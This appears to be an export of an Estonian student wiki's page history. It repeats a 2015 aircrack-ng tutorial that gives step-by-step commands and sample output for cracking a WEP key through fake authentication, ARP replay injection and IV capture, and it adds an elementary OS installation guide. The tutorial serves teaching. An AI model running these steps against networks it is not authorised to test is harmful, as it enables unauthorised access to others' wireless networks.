* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.
 
 
==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume:
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==
====Samm 1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi====
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liidese:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>

Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval '''airmon-ng stop athX''' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!

====Samm 2: Testime „süstimise“ suutlikkust pääsupunktile====
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:
-9 - “süstimise” test
-e teddy – raadiovõrgu nimi
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress
ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.

====Samm 3: Avada airodump-ng pakettide püüdmiseks====
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:
-c 9 – raadiovõrgu kanal
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>

====Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga====
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>
''
Selgitus:
-1 – võlts autentimine
0 – kordusühendus(t)e aeg sekundites
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
Ebaõnnestumise korral on tulemus:
8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>

====Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis====
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>

====Samm 6: Ava aircrack-ng salasõna lahti murdmiseks====
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references/>

=Autor(id)=

Kelly Tragel [ISa 21]
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
<tr>
<td> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
</tr>
<tr>
</table>

Aircrack

2015-05-25T18:55:02Z

Ktragel:

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=Näide WEP kräkkimise protsessist=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0 

Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks. 

Lühidalt sammudest, mida tegema asume: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

'''Samm 1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liidese:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>

Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval '''airmon-ng stop athX''' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!

'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:
-9 - “süstimise” test
-e teddy – raadiovõrgu nimi
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress
ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.

'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:
-c 9 – raadiovõrgu kanal
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>

'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>
''
Selgitus:
-1 – võlts autentimine
0 – kordusühendus(t)e aeg sekundites
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
Ebaõnnestumise korral on tulemus:
8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
'''
Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>

'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references/>

=Autor(id)=

Kelly Tragel [ISa 21]
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
<tr>
<td> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
</tr>
<tr>
</table>

Aircrack

2015-05-18T08:21:19Z

Ktragel: Created page with "Kelly Tragel A21"

Kelly Tragel
A21

Elementary OS paigaldamine

2015-01-15T12:31:05Z

Ktragel: /* Kasutatud kirjandus */

[[Category: Operatsioonisüsteemide administreerimine ja sidumine]]

=='''Mis on elementary OS? '''==

[[File:Luna.png|thumb|right|350px|elementary OS "Luna"]]

elementary OS (edaspidi eOS) on Ubuntul baseeruv Linuxi distributsioon. Selle peamine erinevus võrreldes Ubuntuga on, et kui viimane kasutab töölauakeskkonnana Unity-t, siis eOS-le on kirjutatud päris 0-st üles oma kasutajaliides- Pantheon. See on hästi lõimitud spetsiaalselt eOS-le loodud rakendustega nagu Plank (kiirkäivitusriba), Midori (vaikimisi veebibrauser) ja Scratch (lihtne teksti redigeerimise tööriist). [1]

=='''Visioon ja taust'''==

Liikvel olevate eksiarvamuste tagasi lükkamiseks tuleb öelda, et eOS ei ole lihtsalt kamba arendajate poolt loodud kujundus, mida Ubuntu all nn programmi näol käivitada saaks. eOS sai küll alguse teemade ja rakenduste komplektist, mis olid algselt mõeldud Ubuntule, kuid ajaga kasvas sellest siiski välja täiesti uus distributsioon. Jäädes aga seejuures Ubuntu põhiseks, ühilduvad viimase repositooriumid ja paketid täielikult eOS-ga. [2]

Kasutajaliides Pantheon on saanud oma praeguse kuju ajast, mil arendusmeeskond pärast Jupiteri välja laskmist leidis, et kasutajakogemuse parandamiseks tuleks töölaua keskkond uuel moel üles ehitada. GNOME-lt kisti küljest kõik, mida ei tahetud ega peetud vajalikuks ning vahetati välja uute, omalt poolt ehitatud asendustega. Pantheon-i eesmärgiks on seatud olla intuitsioonil põhinev (kergesti hoomatav ja käsitletav), mis ei ehmataks esimese hooga uut kasutajat ära, ega nõuaks ülearust “nuputamist”. [3]

=='''Versioonid'''==

Esimene stabiilne versioon eOS-st kandis nime Jupiter ning tuli välja 31. märtsil 2011. See baseerus Ubuntu 10.10 versioonil, kuid pärast 2012. aasta oktoobrit ei ole enam toestatud ega ka ametlikul kodulehel (http://elementaryos.org/) kättesaadav. [4][5]

Teine versioon eOS-le avaldati 2012. aasta novembris, kuid sel puhul oli tegu beta versiooniga, mis kandis koodnimetust Luna. Luna põhineb Ubuntu 12.04 LTS versioonil. [6] Pea pool aastat hiljem, 6. mai 2013 tuli välja ka Luna teine beta versioon , mis parandas enam kui 300 tarkvaralist viga ning viis sisse ka mitmeid teisi muudatusi. Näiteks laiendas uus versioon regioonide valikut, juurde tuli mitme kuva toetus, sisse viidi visuaalseid täiustusi ning uuendati ühes rakendusi. [6][7] 7. augustil 2013 ilmus ametlikule koduleheküljele stardiloendur, mis lõppes 3 päeva hiljem, 10. augustil, teise stabiilse versiooni väljalaskmisega. [8][1]

Kolmanda stabiilse versiooni nimi Isis, sai välja käidud veel sama aasta augustis projekti liidri Daniel Foré poolt. [9] Nimi muudeti hiljem Freya-ks, et vältida sarnasusseost militaristliku grupi ISIS-ega. [10] Esimene beta versioon Freya-st avaldati 11. augustil 2014. aastal ning see toetub Ubuntu 14.04 LTS versioonile. [9][11]

=='''elementary OS paigaldamine'''==

Miinimumnõuded arvutile [12]:
* 1 GHz x86 protsessor
* 512MB põhimälu (RAM) (soovituslik: 1GB)
* 5GB vaba kettaruumi (soovituslik: 15GB)
* Graafikakaardi ja ekraani lahutusvõime 1024x768
* CD/DVD-lugeja või USB-lt bootimise võimalus

Tarkvara, mis ühes eOS Lunaga kaasa tuleb [12]:
* File Roller: arhiivihaldur
* Geary: E-posti klient
* GNOME Calculator (ehk gcalctool): kalkulaator
* Empathy: kiirsuhtlus- ja Internetitelefoni (VoIP) klient
* Maya: kalender
* Midori: veebibrauser
* Noise: audiomängija
* Pantheon Files: failihaldur
* Pantheon Terminal: terminaliemulaator
* Scratch: tekstiredaktor
* Screenshot: kuvatõmmiste tegemise tööriist
* Shotwell: fotohaldur
* Simple Scan: dokumentide skaneerimise tööriist
* Switchboard System Settings: juhtpaneel (funktsioonilt sarnaneb Windowsi Control Panel-ile)
* Totem: filmimängija
* Ubuntu Software Center: tarkvarahaldur
* Update manager: uuendushaldur

----

eOS on antud tasuta kasutusse, muidugi võimalusega vabatahtlikel arendusmeeskonda rahaliselt toetada.
Installatsiooni viisardiks on Ubiquity, mis on tuttav juba Ubuntust ja ühtlasi leiab kasutust ka temast “tuletatud” distributsioonidel.
(Kõik järgnevad installatsiooni pildid on võetud välisest allikast) [13]

==== Samm 1: Loo Live USB või CD ====

Esmalt tuleks luua Live CD/USB, millega saab eOS-i kas arvutisse installida või vajadusel ka kasutada otseselt ilma süsteemi paigaldamata. Kuidas seda teha, loe täpsemalt [http://www.ubuntu.com/download/desktop/ siit] või [http://elementaryos.org/docs/user-guide/creating-an-install-disk siit].

==== Samm 2: Bootimine ====

Ühenda Live USB või ketas seadmega ja taaskäivita arvuti. Hetkel, mil arvuti end üles bootib, vajuta F10 või F12, et jõuda boot menüüsse. Sealt tuleks valida vastavalt kas USB, CDROM, Removable Media või muud sarnast (rohkem abi [http://elementaryos.org/docs/user-guide/booting-the-install-disk siit]).

==== Samm 3: Alusta paigaldamist ====

Järgnevalt peaks ilmuma installatsiooni aken, kus tuleb ära märkida keel ning valida emma-kumma vahel, kas proovida või paigaldada eOS kohe arvutisse.

[[File:In1.jpg|500px|Valik1]]

Seejärel näidatakse, kas kõik (osa soovituslikke) nõuded on täidetud: vähemalt 4.3GB vaba kettaruumi, olemasolev ühendus vooluallikaga ja Internetiga. Lisaks on võimalus valida, kas installeerida uuendused ühes eOS-i enda paigaldamisega või, kas paigaldada ka ühes kolmandate osapoolte tarkvara.

[[File:In2.jpg|500px|Valik2]]

==== Samm 4: Partitsioonide loomine ====

Tuleb langetada otsus, kas tühjendada kogu kõvaketas ja paigaldada sellele üksnes eOS või luua eOS-le uus partitsioon, et paigaldada see juba näiteks mõne muu olemasoleva operatsioonisüsteemi kõrvale.

[[File:In4.jpg|500px|Valik3]]

==== Samm 5: Loo root, swap ja home ====

Vaba kettaruumi kujutab endast Device tulbas free space rida. Alustuseks loome root partitsiooni: klõpsa free space reale ja vajuda Add…

[[File:In3.jpg|500px|Valik4]]

Järgnevalt vali root-i suurus (hea valik langeb 2GB ja 8GB vahele), märgi failisüsteemiks ext4 ja ja mount point-iks / (ehk root).

[[File:In6.png|500px|Valik5]]

Pärast seda loome swap partitsiooni. Üldine soovitus on, et swap suurus võiks olla 50% kuni 100% füüsilise RAM-i suurusest.

[[File:In5.png|500px|Valik6]]

Ning viimasena loome Home partitsiooni. Home-le tuleks kõige rohkem ruumi anda, sest see on koht, kuhu hakatakse üldiselt kõiki meie faile jms talletama.

[[File:In7.png|500px|Valik7]]

Pärast edukat Root, Swap ja Home partitsioonide loomist tuleb vajutada Install Now.

[[File:In8.jpg|500px|Valik8]]

==== Samm 6: Trivaalsete juhendite jälgimine ====

Märkida tuleb ära asukoht, kus me parasjagu oleme, klaviatuuri asetus ning anda masinale nimi ja luua sisse logimiseks kasutaja.
Kui paigaldamine on lõppenud, ilmub järgnev aken:

[[File:In9.png|500px|Valik9]]

Soovituslik oleks teha masinale restart.

=='''Kokkuvõte'''==

elementary OS märksõnadeks võiksid olla: kasutuslihtsus, kergus ja minimalistlik disain ehk teisisõnu on tegu trendika Linuxi distroga. Minu tähelepanek: töölaua keskkonnal Pantheon-il on mõningaid ühiseid jooni just funktsioneerimise ja visuaalse poole pealt Mac OS X-I ja GNOME Shell-iga.

